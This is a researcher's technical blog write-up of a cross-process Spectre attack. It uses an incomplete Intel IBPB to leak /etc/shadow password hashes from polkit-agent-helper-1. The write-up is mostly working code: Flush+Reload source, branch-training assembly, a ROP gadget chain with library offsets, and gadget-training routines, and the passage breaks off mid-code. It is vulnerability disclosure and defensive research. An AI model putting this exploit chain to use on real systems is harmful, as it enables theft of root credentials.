Cross-Process Spectre Exploitation
By Johannes Wikner
October 18, 2024
I will walk through a cross-process Spectre attack I developed, partly while interning at Open Source Security, Inc.
Cross-Process Spectre
I have developed an exploit to demonstrate the impact of an incomplete Indirect Branch Prediction Barrier (IBPB) in Intel Golden Cove and Raptor Cove that I discovered. IBPB is meant to invalidate all indirect branch target predictions, which includes returns and jump/call instructions that take a memory or register operand (i.e., indirect branches). However, due to buggy microcode -- which appears to be an emergent problem in modern processors -- certain return target predictions are retained across IBPBs.
Back at ETH, Kaveh and I wrote a paper on this matter that we're publishing today along with this write-up. In the paper we also exploited a semantics issue of IBPB on certain AMD parts, leading to privileged memory disclosure on systems using IBPB-on-entry, which ironically is meant to be the more comprehensive mitigation alternative to the suspicious-looking, software-based SafeRET and retbleed thunk mitigations. In this write-up I will focus on the cross-process exploit, which is special for a couple of reasons.
- AFAIK, this is the first end-to-end cross-process Spectre exploit that does not attack a fake toy program.
- The overwhelming majority of software authors are unconcerned about cross-process Spectre attacks, indicated by the fact that none of them enable IBPB. The only exception I've seen is Google Chrome.
Unlike OS kernels, which are packed with thousands of lines of code to select the appropriate mitigations to fend off cross-privilege Spectre attacks, user programs do nothing -- even if they run as root and manage sensitive information (e.g., OpenSSH, sudo, polkit). With this work, I hope to convince the authors of such programs to use IBPB. However, even if they did use IBPB, they would have been vulnerable to the attack I'll explain anyway. Intel has patched the IBPB issue in a microcode update released earlier this year, so now they would be safe.
What IBPB?
Branch prediction state is shared across processes running on the same core. While predictions may be restricted to the sibling thread and privilege domain they belong to, programs running in the same thread and privilege domain can influence each other's speculative control flow. To prevent this, IBPB should be used. IBPB is triggered from the privileged domain with a Model-Specific Register (MSR) write:
movq $0x49, %rcx   ; MSR_IA32_PRED_CMD
movq $1, %rax      ; PRED_CMD_IBPB
xor  %rdx, %rdx
wrmsr
User programs can enable this via the prctl() ABI. Besides user programs, hypervisors like KVM will unconditionally use IBPB when switching vCPUs. It is also likely -- however I didn't test it, and it is not explicitly documented -- that transitioning to SGX enclaves and to SMM imposes an implicit IBPB as well.
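For a user program, opting in could look roughly like this minimal sketch (whether to use PR_SPEC_DISABLE or the stricter PR_SPEC_FORCE_DISABLE that appears later in this write-up is a policy choice; error handling is kept minimal):

#include <sys/prctl.h>
#include <linux/prctl.h>
#include <err.h>

int main(void)
{
    /* Ask the kernel to protect this task's indirect branch predictions from
     * other tasks; with the default prctl-based policy the kernel then issues
     * IBPB on the relevant context switches. */
    if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH,
              PR_SPEC_DISABLE, 0, 0))
        err(1, "PR_SET_SPECULATION_CTRL");

    /* ... handle secrets, prompt for passwords, etc. ... */
    return 0;
}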
Before delving deeper, we'll cover some additional background on Spectre attacks.
How Spectre mis-speculations are exploited
Most of us are aware of at least some of the various Spectre vulnerabilities that modern processors are susceptible to. In a Spectre attack, the goal of the attacker is to leak unauthorized data by combining transient execution of incorrect control flow, caused by a branch misprediction, with side-channel analysis.
Branch misprediction
Branch prediction concerns conditional branch directions (e.g., taken vs. fall-through) and branch target addresses stored in microarchitectural, core-local, table-like data structures. Our focus is on branch target address predictions. Intel processors are known to store these in Branch Target Buffers (BTBs) and TAGE-table-like structures. We do not need to understand exactly how these work. However, for a mental picture, I show an illustration of my own view below. Details about Intel's TAGE configuration I copied from the recent Indirector paper. (I am not claiming that this resembles any actual implementation, but it works for the purpose of this write-up.)
[Illustration: IP[23:0] indexes a ~1K-set, 12-way BTB. Each BTB entry holds an 8-bit TAG, 1-bit THREAD, 2-bit PL, 2-bit TYPE, 1-bit OF, and a 32-bit TARGET. TYPE selects the prediction path: RETURN uses the RSB (falling back to RSBA when it is empty), INDIRECT uses TAGE, DIRECT uses the static TARGET, and CONDITIONAL consults the PHT for the taken/fall-through decision. Three TAGE tables (512 sets, 2 entries each) are indexed by IP[15:6] combined with BHB[67:0], BHB[131:0], and BHB[387:0] respectively -- a history of up to 194 branches. Each TAGE entry holds a 10-bit TAG, a 48-bit TARGET, and a 2-bit PL.]
The BTB is a set-associative buffer that is indexed by the current Instruction Pointer (IP), where each BTB entry contains a static target and a type. If the type is INDIRECT, the (indirect) branch target prediction is in fact dynamic and depends on the path history. If the type is RETURN, we should receive the branch target from the Return Stack Buffer (RSB), which records the upcoming return address for every encountered call instruction. Storing branch type information within the BTB allows the processor to prepare a prediction ahead of time, before instruction decode of its branch source has completed, which can lead to Phantom speculation, which SRSO exploits.
For indirect branch target prediction, the BTB becomes the 0th-level "tagless" TAGE table that is used when there is no correlation between path history and the branch. Otherwise, we will also consider the branch targets from higher-level TAGE tables, picking the target that correlates with the longest path history. Intel refers to this path history as a Branch History Buffer (BHB). If the current BHB does not correlate with a prediction in the TAGE tables, we fall back to the static target of the BTB.
For return target prediction, the BTB and TAGE entries may also become relevant should the RSB not reference a valid target, for example because the RSB is empty. If so, Intel's "bottom-less" RSB instead uses an alternate prediction scheme (RSBA), which essentially means treating the BTB entry of the return as if it had type INDIRECT. For this to work, every time a return is executed, it not only updates the RSB state but also updates the indirect branch predictor with return targets.
Additional information needs to be stored, like the privilege level PL, the hardware thread THREAD, and an overflow bit OF to determine whether a direct branch target crosses a 4 GiB boundary. I also imagine that information on whether the branch is a CALL might be recorded for faster RSB updates.
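To tie the pieces above together, here is a deliberately simplified software model of the target selection just described. This is purely my mental model: the lookup helpers (btb_lookup, rsb_pop, tage_lookup) are invented stubs, and no claim is made that it matches the real hardware.

#include <stdint.h>
#include <stdbool.h>

enum btype { T_COND, T_DIRECT, T_INDIRECT, T_RETURN };

struct btb_entry { bool valid; enum btype type; uint32_t target32; }; /* static target: low 32 bits only */

#define TAGE_LEVELS 3

/* Stub lookups standing in for the structures in the illustration: */
static struct btb_entry *btb_lookup(uint64_t ip);   /* indexed/tagged by low IP bits */
static bool rsb_empty(void);
static uint64_t rsb_pop(void);                      /* most recent call's return site */
static bool tage_lookup(int lvl, uint64_t ip, const uint64_t *bhb, uint64_t *target);

static uint64_t predict_target(uint64_t ip, const uint64_t *bhb)
{
    struct btb_entry *e = btb_lookup(ip);
    if (!e || !e->valid)
        return 0;                                   /* no prediction at all */

    if (e->type == T_RETURN && !rsb_empty())
        return rsb_pop();                           /* normal return prediction via the RSB */

    if (e->type == T_DIRECT || e->type == T_COND)   /* for conditionals, the PHT decides taken/fall-through */
        return (ip & ~0xffffffffULL) | e->target32;

    /* INDIRECT, or RETURN with an empty RSB (RSBA/RRSBA): prefer the TAGE
     * entry that matches the longest path history. */
    for (int lvl = TAGE_LEVELS; lvl >= 1; --lvl) {
        uint64_t t;
        if (tage_lookup(lvl, ip, bhb, &t))
            return t;
    }

    /* No path correlation: fall back to the BTB's static target, which holds
     * only the low 32 bits and is presumably completed with the branch's own
     * upper bits -- which is what the experiment later in this write-up suggests. */
    return (ip & ~0xffffffffULL) | e->target32;
}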
Side-channel analysis
What we most commonly see in Spectre attacks is that the attacker forces the victim to make a misprediction to transiently access unauthorized memory ("secrets") and use it in subsequent secret-dependent operations. The attacker can deduce the secret via a Flush+Reload (F+R) side channel. F+R is a comparably fast and low-noise side channel, but it relies on memory sharing between the attacker and the victim. That is usually not a concern, however. For example, all user memory is shared with the kernel via the physmap, and the non-writable sections of shared libraries are shared across all processes using the library (so you don't need to keep 1000 copies of glibc in memory for every running program ;))
Flush+Reload
Here is an F+R example. We introduce a "reload buffer" RB that contains a number of entries that will be flushed and reloaded while measuring their access times, revealing whether the memory was fetched after it was flushed. Each entry has a corresponding bin in a histogram RB_HIST. When reloading, if there is a cache hit for a particular entry (deduced from its access time), the respective bin is incremented.
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <err.h>

/* it's generally better to hardcode the hit/miss threshold than to compute it:
 * 1. threshold becomes an immediate
 * 2. calibrating requires a warmup to get a stable value => slow.
 * The following should detect LLC misses on all microarchs. */
#ifndef CACHE_MISS_THRES
#define CACHE_MISS_THRES 150
#endif

#ifndef RB_PTR
/* The Reload Buffer "RB" will take a hardcoded address so that it is unlikely
 * to neighbor other data */
#define RB_PTR 0x13200000UL
#endif

#ifndef RB_STRIDE
/* Each cache line that we flush+reload is separated by 4096 bytes. Smaller
 * strides are possible, but increase the chance of data cache prefetching =>
 * noisy results. */
#define RB_STRIDE (1UL<<12)
#endif

#ifndef RB_SLOTS
/* If we're just testing if a side channel works, we are fine with just a few
 * entries. To leak full bytes we would need 256 entries. */
#define RB_SLOTS 8
#endif

#ifndef SECRET
/* If we're just testing if a side channel works, we can aim at leaking a
 * pre-determined "secret" value. */
#define SECRET 6
#endif

#ifndef RB_OFFSET
/* Rather than reloading a page-aligned address, we can pick something else.
 * The first few CLs of a page are more likely prefetched than others. */
#define RB_OFFSET 0x180
#endif

#ifndef RB_HIST
/* We keep the results in a histogram with RB_SLOTS bins. We give it a fixed
 * address too to make the reloading code position independent. */
#define RB_HIST 0x1800000
#endif

#ifndef mb
/* Wait for all memory operations to complete before continuing. */
#define mb() asm("mfence" ::: "memory");
#endif

typedef unsigned long u64;
typedef unsigned int u32;
typedef unsigned char u8;

/* Start measure */
static __always_inline u64 rdtsc(void) {
    unsigned lo, hi;
    asm volatile ("lfence\n\t"
                  "rdtsc\n\t"
                  : "=d" (hi), "=a" (lo));
    return ((u64)hi << 32) | lo;
}

/* Stop measure */
static __always_inline u64 rdtscp(void) {
    unsigned lo, hi;
    asm volatile("rdtscp\n\t"
                 "lfence\n\t"
                 : "=d" (hi), "=a" (lo) :: "ecx");
    return ((u64)hi << 32) | lo;
}

/**
 * Reload the n cache lines used for flush+reload. If access time is below the
 * threshold, increment the respective counter for the histogram/results.
 */
static __always_inline void reload_range(long base, long stride, int n, u64 *results) {
    mb();
    /* unroll the loop to avoid triggering the data cache prefetcher. */
#pragma clang loop unroll(full)
    for (u64 k = 0; k < n; ++k) {
        /* semi-randomize the reload-order to avoid triggering the data cache prefetcher */
        u64 c = (k*7+5)&(n-1);
        unsigned volatile char *p = (u8 *)base + (stride * c);
        u64 t0 = rdtsc();
        *(volatile unsigned char *)p;
        u64 dt = rdtscp() - t0;
        if (dt < CACHE_MISS_THRES) results[c]++;
    }
}

/**
 * Flush all the cachelines used for flush+reload.
 */
static __always_inline void flush_range(long start, long stride, int n) {
    mb();
    for (u64 k = 0; k < n; ++k) {
        volatile void *p = (u8 *)start + k * stride;
        asm volatile("clflushopt %0\n" ::"m"(*(const char *) p));
    }
}

static u8 *rb = (u8 *)RB_PTR;
static u64 *rb_hist = (u64 *)RB_HIST;

#define ROUND_2MB_UP(x) (((x) + 0x1fffffUL) & ~0x1fffffUL)
/* Prefer huge pages for the reload buffer => less noise. */
#define RB_SZ ROUND_2MB_UP((RB_SLOTS * RB_STRIDE) + 0x1000UL)
#define MMAP_FLAGS (MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED_NOREPLACE)

/**
 * Convenience macros.
 */
#define rb_reset()  memset(rb_hist, 0, RB_SLOTS * sizeof(*rb_hist))
#define rb_flush()  flush_range(RB_PTR+RB_OFFSET, RB_STRIDE, RB_SLOTS);
#define rb_reload() reload_range(RB_PTR+RB_OFFSET, RB_STRIDE, RB_SLOTS, rb_hist);

/**
 * Initialize the flush+reload buffer referenced by RB_PTR and the results
 * (RB_HIST).
 */
static void rb_init() {
    /* Histogram, or simply put, the results. */
    if (mmap((void *)RB_HIST, RB_SLOTS*sizeof(u64), PROT_READ | PROT_WRITE,
             MMAP_FLAGS|MAP_POPULATE, -1, 0) == MAP_FAILED) {
        err(1, "rb_hist");
    }
    if (mmap((void *)RB_PTR, RB_SZ, PROT_READ | PROT_WRITE,
             MMAP_FLAGS, -1, 0) == MAP_FAILED) {
        err(1, "rb");
    }
    /* Try to make this page a single 2MB page, to avoid TLB misses when
     * reloading. */
    madvise((void *)RB_PTR, RB_SZ, MADV_HUGEPAGE);
    memset((void *)RB_PTR, 0xcc, RB_SZ); /* Make sure it isn't zero-page backed */
}

#define ROUNDS 1000
int main(void) {
    rb_init();
    rb_flush();
    rb_reset();
    for (int i = 0; i < ROUNDS; ++i) {
        rb_flush();
        mb();
        // touch something.
        *(u8 *) (RB_PTR+RB_OFFSET+SECRET*RB_STRIDE) = 12;
        mb();
        // we will be able to deduce what entry was touched.
        rb_reload();
    }
    // print each bin.
    for (int i = 0; i < RB_SLOTS; ++i) {
        printf("%04ld ", rb_hist[i]);
    }
    printf("\n");
    return 0;
}
The code should be compiled with clang, with optimizations enabled. Running it will result in the entry index defined by SECRET getting hot.
clang -Og -DSECRET=6 ./ex1.c -o ex1 && ./ex1
# > 0000 0000 0000 0000 0000 0000 1000 0000
clang -Og -DSECRET=4 ./ex1.c -o ex1 && ./ex1
# > 0000 0000 0000 0000 0999 0000 0000 0000
See how the results turn noisier if we, for example, reduce the stride and increase the number of entries (n.b. it must still be a power of 2).
clang -Og -DRB_SLOTS=32 -DRB_STRIDE=128L ./ex1.c -o ex1 && ./ex1
# > 0000 0000 0003 0002 0002 0000 0999 0000 0000 0001 0000 0000 0000 0000 0000 0000 0000 0000 0001 0000 0001 0001 0000 0001 0001 0000 0000 0001 0000 0000 0000 0000
Comparing the signal of the expected-hot entry with the other entries lets us infer how noisy the measurement is, and it lets us detect bugs. For example, if we forget to enable optimizations, we immediately see that something is not right.
clang ./ex1.c -o ex1 && ./ex1
# > 0999 1000 0996 0999 0125 0000 1000 0000
We will use F+R to observe indirect branch target misprediction.
Observe indirect branch misprediction
There is a key difference between path-history-based and IP-based indirect branch target prediction. The IP-based one uses the BTB, which only has the lower 32 bits of the target. We can observe this with a simple F+R experiment.
Consider the following four snippets.
/* training branch source */
mk_snip(tr_src,
    "mov $" STR(RB_PTR) ", %rax;"
    "clflush (%rdi);"
    "mfence ;"
#ifdef USE_RET
    "push (%rdi) ;"
    "ret ;"
#else
    "jmp *(%rdi) ;"
#endif
);

/* victim branch source */
mk_snip(vi_src,
    "mov $" STR(RB_PTR) ", %rax;"
    "clflush (%rdi);"
    "mfence ;"
#ifdef USE_RET
    "push (%rdi) ;"
    "ret ;"
#else
    "jmp *(%rdi) ;"
#endif
);

/* This one will never execute */
mk_snip(tr_dst_IP,
    /* signals "2", assumes RB_PTR in rax */
    "mov " STR(RB_OFFSET + RB_STRIDE * 2)"(%rax), %rax;"
    "lfence;"
    "ret;"
);

mk_snip(tr_dst_BHB,
    /* signals "4", assumes RB_PTR in rax */
    "mov " STR(RB_OFFSET + RB_STRIDE * 4)"(%rax), %rax;"
    "lfence;"
    "ret;"
);
We assign these snippets the following code pointers.
init_snip(&tr_src_desc,     0x10000000000, tr_src);
/*                                 v- bit 24 */
init_snip(&vi_src_desc,     0x01001000000, vi_src);
/*                               v-- bit 32 */
init_snip(&tr_dst_BHB_desc, 0x10020000000, tr_dst_BHB); /* Near the tr_src */
init_snip(&tr_dst_IP_desc,  0x01020000000, tr_dst_IP);  /* Near the vi_src */
On Golden Cove and Raptor Cove, only the lower 24 bits of the IP are used to address the BTB. Hence, tr_src and vi_src resolve to the same BTB set and tag (i.e., they alias). After we execute tr_src with a pointer to tr_dst_BHB in rdi, a new prediction is created. The BTB however only contains the lower 32 bits of the target, while the full target is stored in the TAGE tables. So the question is: after training tr_src with tr_dst_BHB as the target, will tr_dst_BHB or tr_dst_IP be predicted when we execute vi_src?
Assuming the path history leading up to vi_src was different, maybe it predicts tr_dst_IP once. However, the next time it will recognize the mistake and avoid repeating it. To make it consistently mispredict tr_dst_IP or tr_dst_BHB, we need to introduce path history.
#define OP_RET 0xc3
#define BHB_AREA 0x4400000000L

static void init_bhb_area() {
    if (mmap((void *)BHB_AREA, 1L<<24, PROT_READ|PROT_WRITE|PROT_EXEC,
             MMAP_FLAGS, -1, 0) == MAP_FAILED) {
        err(1, "bhb_area");
    }
}

static void random_bhb(u64 *bhb, int n) {
    for (int i = 0; i < n; ++i) {
        // some random sequence of return branches in the BHB_AREA
        bhb[i] = BHB_AREA + (random()%(1L<<24));
        *(u8 *) bhb[i] = OP_RET;
    }
}

#define BHB_LEN 195
static u64 bhb[BHB_LEN];
static code_snip_t tr_src_desc, vi_src_desc, tr_dst_BHB_desc, tr_dst_IP_desc;

int main(void) {
    init_bhb_area();
    srandom(getpid());
    random_bhb(bhb, BHB_LEN);

    init_snip(&tr_src_desc,     0x10000000000, tr_src);
    init_snip(&tr_dst_BHB_desc, 0x10020000000, tr_dst_BHB);
    init_snip(&vi_src_desc,     0x01001000000, vi_src);
    init_snip(&tr_dst_IP_desc,  0x01020000000, tr_dst_IP);

#define ROUNDS 1000
    for (int i = 0; i < ROUNDS; ++i) {
        /* train */
        asm(
            "lea 33f(%%rip), %%rax ;" /* return address after training */
            "push %%rax            ;"
            "push %1               ;" /* training source */
            "mov %0, %%rbx         ;" /* add the branch history */
            ".rept " STR(BHB_LEN) ";"
            "  push (%%rbx)        ;"
            "  add $8, %%rbx       ;"
            ".endr                 ;"
            "ret                   ;" /* go through BHB, then branch source */
            "33:                   ;"
            :: "r"(bhb), "r"(tr_src_desc.ptr), "D"(&tr_dst_BHB_desc.ptr)
            : "rax", "rbx");

        rb_flush();

        /* DO STUFF HERE */

        /* run victim */
        asm(
            "lea 33f(%%rip), %%rax ;"
            "push %%rax            ;"
            "mov %%rsp, %%rdi      ;" /* vi_src will take us right back to "33:" */
            "push %1               ;"
            "mov %0, %%rbx         ;"
            ".rept " STR(BHB_LEN) ";"
            "  push (%%rbx)        ;"
            "  add $8, %%rbx       ;"
            ".endr                 ;"
            "ret                   ;"
            "33:                   ;"
            "add $8, %%rsp         ;" /* re-adjust stack */
            :: "r"(bhb), "r"(vi_src_desc.ptr)
            : "rdi", "rax", "rbx");

        rb_reload();
    }
    rb_print();
    return 0;
}
If we run this, we get:
0000 0000 0000 0000 1000 0000 0000 0000 # jmp*, matching bhb
Unsurprisingly, thanks to the matching path history leading up to vi_src and tr_src, vi_src mispredicts tr_dst_BHB. If we instead randomize the BHB before we run vi_src, for example by inserting random_bhb(bhb, BHB_LEN); before /* run victim */, we instead get:
0000 0000 0930 0000 0001 0000 0000 0000 # jmp*, randomized bhb
In fact, because all TAGE table addressing depends on the most recent path history, randomizing only the last branch in the BHB yields the same result as the above.
So the misprediction now took tr_dst_IP -- which is funny, because we never executed that code in the program. We can now do the same thing with USE_RET defined, so that returns are used instead, and we get:
0000 0000 0000 0000 0979 0000 0000 0000 # ret, matching bhb
0000 0000 0324 0000 0000 0000 0000 0000 # ret, randomized bhb
So we get the same result, but with a somewhat weaker signal. Many of you might find it strange to see what appear to be indirect branch target predictions on top of returns. However, this is an Intel feature that has many names, such as "bottom-less RSB", "RSBA", "RRSBA". Return Stack Buffer Alternate (RSBA) occurs when the RSB is empty. Because of our long path history, consisting only of returns, the RSB is guaranteed to be empty when we hit the victim branch, hence we get RSBA. To be precise, on eIBRS systems we call it Restricted RSBA (RRSBA), since the alternate predictions (not the RSB predictions) are protected by eIBRS (they are indirect branch predictions after all).
Bring in IBPB
We want to check whether IBPB handles these predictions. There's a super easy way (thanks to bsdaemon ;)) to trigger IBPB on Linux 6.2+; we can just do:
prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, PR_SPEC_FORCE_DISABLE, 0, 0);
I was on an Ubuntu 5.15.0-97-generic kernel while doing this work, so I did the same using a kernel module instead. Now, if we issue an IBPB after training and test vi_src for (1) path-based and (2) IP-based predictions, for (a) indirect branches and (b) returns, we expect all predictions to be invalidated and therefore all signal to be gone. Instead, however, we get something unexpected.
0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, jmp*, (1,a)
0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, ret,  (1,b)
0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, jmp*, (2,a)
0000 0000 0155 0000 0000 0000 0000 0000 # ibpb, ret,  (2,b)
We are still getting signal from tr_dst_IP, post-IBPB! It took a while to conclude that this was not a software bug. In fact, this is a microcode bug! The prediction is retained across the IBPB. But what should we do with this interesting effect?
Build a cross-process Spectre leak
Two things that IBPB is used for are context switches and vCPU switches. While it would be cool (and certainly not impossible) to leak information from a co-tenant VM with this primitive, it appears easier to prove the impact of the vulnerability by targeting context switches between processes.
The funny thing is, however, that nobody appears to have built a real cross-process Spectre attack in the past. So in order to prove that IBPB bugs are a real problem, we must first build a cross-process Spectre exploit -- one that IBPB should protect against.
Another funny thing is that the only victim candidate I found that was using IBPB was Google Chrome. But we are already deep down in a mess, and descending deeper, into JavaScript hell, would not do my sanity well.
Instead we will target a SUID program that lets you authenticate as root via a password prompt. After a bit of poking around, I decided that polkit appeared to be a perfect victim, specifically the /usr/libexec/polkit-agent-helper-1 that is present on most Linux machines.
polkit-agent-helper-1 is not meant to be run by humans, but reading its source code shows that it takes two arguments: the user to authenticate as (we will use root, of course) and a "cookie", which we don't really care about. Secondly, stdin must be anything but a tty for it to work. So we can run it like:
while true; sleep 2; do echo -n A; done | /usr/libexec/polkit-agent-helper-1 root asdfadsf
# > PAM_PROMPT_ECHO_OFF Password:
Since the attacker can obtain the same binaries and libraries as the victim (e.g., via apt repos), they can debug this program with full privileges locally. So we run strace on it:
while true; sleep 2; do echo -n A; done | sudo strace -eopenat,read /usr/libexec/polkit-agent-helper-1 root asdfadsf
# > read(3, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 2669
# > openat(AT_FDCWD, "/etc/shadow", O_RDONLY|O_CLOEXEC) = 3
# > read(3, "root:$6$HGU6y/YF5$rf5na/CbCxzKWR"..., 4096) = 1651
# > PAM_PROMPT_ECHO_OFF Password:
# > read(0, "A", 4096) = 1
# > read(0, "A", 4096) = 1
# > read(0, "A", 4096) = 1
# > read(0, ^Cstrace: Process 334359 detached
# > <detached ...>
This is fantastic and weird at the same time! It reads the password hashes from /etc/shadow before even taking the password. It appears that libpam, which manages the authentication, does this to check that the password is valid and hasn't expired. It also stores the password hash in memory, inside the pam context.
We want to hijack a return in this process by first training it in our attacker process, then triggering the victim process to run by sending a character to its stdin.
To figure out which returns are exploitable, we can use Intel PT (via perf) to create a --call-ret trace. I recorded the function graph from my process over the context switch to the polkit helper, which is `read`-ing my process' characters via an `fgets` call in its pam conversation. There are three returns in the victim, all in glibc, that could be exploited if predicted with RRSBA: read, _IO_file_underflow, and _IO_default_uflow. Unfortunately, they are not predicted with RSBA, because the call depth imposed by read in the victim is too shallow. However, the victim accepts any kind of stdin, except a tty. So instead of attaching a normal pipe to interact with the victim's stdin, we can attach a socket. Because sockets are much more complicated to read from, the read call depth of the victim now exceeds the RSB capacity, leading to exploitable RRSBA-predicted returns for all three returns.
We take a look at _IO_default_uflow in gdb, and what we find is surprising!
Breakpoint 1, 0x00007ffff7c46db0 in __GI__IO_default_uflow (fp=<optimized out>) at ./libio/genops.c:366
366     ./libio/genops.c: No such file or directory.
   0x00007ffff7c46daf <__GI__IO_default_uflow+79>:  5d                      pop %rbp
=> 0x00007ffff7c46db0 <__GI__IO_default_uflow+80>:  c3                      ret
   0x00007ffff7c46db1 <__GI__IO_default_uflow+81>:  0f 1f 80 00 00 00 00    nopl 0x0(%rax)
(gdb) i r
rax            0x41                65
rbx            0x0                 0
rcx            0x7ffff7ccd7e2      140737350784994
rdx            0x555555596301      93824992502529
rsi            0x555555596300      93824992502528
rdi            0x0                 0
rbp            0xa                 0xa
rsp            0x7fffffffe148      0x7fffffffe148
r8             0x0                 0
r9             0x555555596300      93824992502528
r10            0x7ffff7dd4270      140737351860848
r11            0x246               582
r12            0x7ffff7dd3aa0      140737351858848
r13            0x0                 0
r14            0x7fffffffe1f0      140737488347632
r15            0x1ff               511
rip            0x7ffff7c46db0      0x7ffff7c46db0 <__GI__IO_default_uflow+80>
eflags         0x202               [ IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb) x/s $rsi
0x555555596300: "Aoot:$6$HGU6y/YF5$rf5na/CbCxzKWRjrkPYDb1oN5ZI7TSxVs8Epz79q9jUyZnIqmmIGYd4lzOVa8I4yyGQ2SSjyd0op5mujCdX4Q.:19755:0:99999:7:::\ndaemon:*:19235:0:99999:7:::\nbin:*:19235:0:99999:7:::\nsys:*:19235:0:99999:7::"...
As we're reading entered characters from the password prompt, the stream buffer that stdin receives password input into (here 'A') already references the secret that we want to leak, and it's referenced by three different registers! Even better, the last entered character sits in rax, which can act as an index to target a specific byte of the secret. How did that happen?
Because the password hashes were read right before presenting the password prompt, the most recently freed memory was the stream buffer of the file handle for /etc/shadow. When we immediately allocate a new stream buffer for stdin, which is of the same size as the previous one, malloc recycles that memory. So the memory that rsi, rdx, and r9 reference is in fact simply uninitialized memory that happened to have held secrets just before.
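This recycling is ordinary glibc malloc behavior and is easy to reproduce in isolation. Here is a minimal standalone sketch (the buffer size and the "secret" string are made up, and nothing here is polkit-specific):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    /* 1. Allocate a buffer and fill it with a "secret" (a stand-in for the
     *    /etc/shadow stream buffer that libpam's read created). */
    char *a = malloc(4096);
    strcpy(a, "root:$6$...:19755:0:99999:7:::");
    free(a);                      /* freed, but the bytes stay in the chunk */

    /* 2. The next same-size allocation (a stand-in for the stdin stream
     *    buffer) gets the very same chunk back from malloc's free lists. */
    char *b = malloc(4096);
    printf("same chunk: %s\n", b == a ? "yes" : "no");
    printf("leftover contents: %.30s\n", b);  /* still the "secret" */

    free(b);
    return 0;
}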
But how should we leak the secret?
Gadget chain
We know that we can hijack a return and make it speculatively execute a target of our choice in the victim's address space. The speculated target needs to read a byte of the secret using rax as an index. Then we need to transmit it to the attacker over an F+R side channel. Because read-only sections of shared libraries are shared in physical memory, the idea is to use the executable section of glibc, referenced by rcx and rip, as the "reload buffer". So we want to make a secret-dependent memory access relative to rcx or rip, so that we can later deduce the secret in the attacker's process.
I realized that it is not going to be easy to find code in the victim's address space (marked "present", as we can't manage #PFs under speculation) that loads part of the secret from memory and transmits it (via F+R) -- not in one single gadget. However, maybe it is possible to stitch together a chain of gadgets that each do one of the necessary operations, and trigger a series of nested return mispredictions to speculatively execute all of them. At this point, I was mildly exhausted, so I reached out to the very encouraging and enthusiastic security folks at Google. They told me that they would be happy to find me a ROP-gadget chain -- they are a search company after all! Indeed, a few days later Chani Jindal sent me a perfect-looking gadget chain:
0x7ffff68efa69: movzx eax, byte [rax+rdx] ; ret ; (/usr/lib/x86_64-linux-gnu/libicuuc.so.70.1)
0x7ffff7cef5b7: rol eax, 0x08 ; ret ;             (/usr/lib/x86_64-linux-gnu/libc.so.6)
0x7ffff75f45ec: shl rax, 0x02 ; ret ;             (/usr/lib/x86_64-linux-gnu/libzstd.so.1.4.8)
0x7ffff73af74b: mov al, byte [rcx+rax] ; ret ;    (/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4)
The first one reads a byte of the secret using the attacker-controllable rax as an index, with zero extension so that the rest of rax gets zapped. The secret byte then gets rotated left by 8 bits, shifted left by another 2, and finally used as an index into a memory load relative to rcx.
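To make the arithmetic concrete, here is a small worked example of the index the chain computes for one secret byte (the byte value 'o' is just an illustration):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint64_t rax = 0x6f;                      /* movzx eax, byte [rax+rdx]: say the byte is 'o' */
    rax = (uint32_t)((uint32_t)rax << 8 |
                     (uint32_t)rax >> 24);    /* rol eax, 8: for byte values this equals a shift, 0x6f00 */
    rax <<= 2;                                /* shl rax, 2: 0x1bc00 = 'o' * 1024 */
    /* mov al, byte [rcx+rax]: touches glibc code at rcx + byte*1024, so every
     * possible byte value maps to its own cache line, which the attacker can
     * later tell apart with flush+reload. */
    printf("offset into glibc text: %#lx\n", (unsigned long)rax);
    return 0;
}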
Exploit!
The procedure works as follows. The attacker forks a new process, pins it and itself to the same hardware thread, and spawns the victim program. Sharing a hardware thread lets the attacker and victim share branch prediction and cache state. The attacker attaches a socket to the stdin of the victim and waits for the password prompt. To train the gadget chain in the victim, we construct and execute a ROP-gadget chain, made up of NOPs (0x90) and RETs (0xc3), at aliasing addresses.
#define LIBC_AX       0x7ffff7be0000
#define LIBICUUC_AX   0x7ffff68eb000
#define LIBZSTD_AX    0x7ffff75ee000
#define LIBPCRE2_8_AX 0x7ffff73ad000

#define GADGET(start, size)       \
    {                             \
        start, start + (size - 1) \
    }

static struct bhb_bb bhb_path_b[] = {
    // __GI__IO_default_uflow
    GADGET(LIBC_AX + 0x065d96, 27),
    // movzbl (%rax,%rdx,1),%eax ; ret   \x0F\xB6\x04\x10\xC3
    GADGET(LIBICUUC_AX + 0x005a69, 5),
    // rol $8, %eax; ret                 \xC1\xC0\x08\xc3
    GADGET(LIBC_AX + 0x10e5b7, 4),
    // shl $2, %rax ; ret                \x48\xC1\xE0\x02\xc3
    GADGET(LIBZSTD_AX + 0x45ec, 5),
    // mov (%rcx,%rax,1), %al ; ret      \x8A\x04\x01\xC3
    GADGET(LIBPCRE2_8_AX + 0x74b, 4)
};
#define BHB_B_LEN (sizeof(bhb_path_b) / sizeof(*bhb_path_b))

void init_gadgetchain(long off)
{
    for (int i = 0; i < BHB_B_LEN; ++i) {
        struct bhb_bb *bb = &bhb_path_b[i];
        memset(_ptr(F(bb->start_adr - off)), 0x90, bb_len(bb));
        memcpy(_ptr(F(bb->end_adr - off)), "\xc3", 1);
    }
}

void train_gadgetchain(u64 off)
{
    static long bbstack[6];
    for (int i = 0; i < BHB_B_LEN; ++i) {
        bbstack[i] = F(bhb_path_b[i].start_adr - off);
    }
    void finland();
    bbstack[BHB_B_LEN] = (long)finland;
    bbstack[0] = F(bhb_path_b[0].start_adr - off);
    asm("mov %%rsp, %%r15 \n"
        "lea 8(%0), %%rsp \n"
        "jmp *(%0)        \n"
        "finland:         \n" /* come back here */
        "mov %%r15, %%rsp \n"
        ::"r"(bbstack)
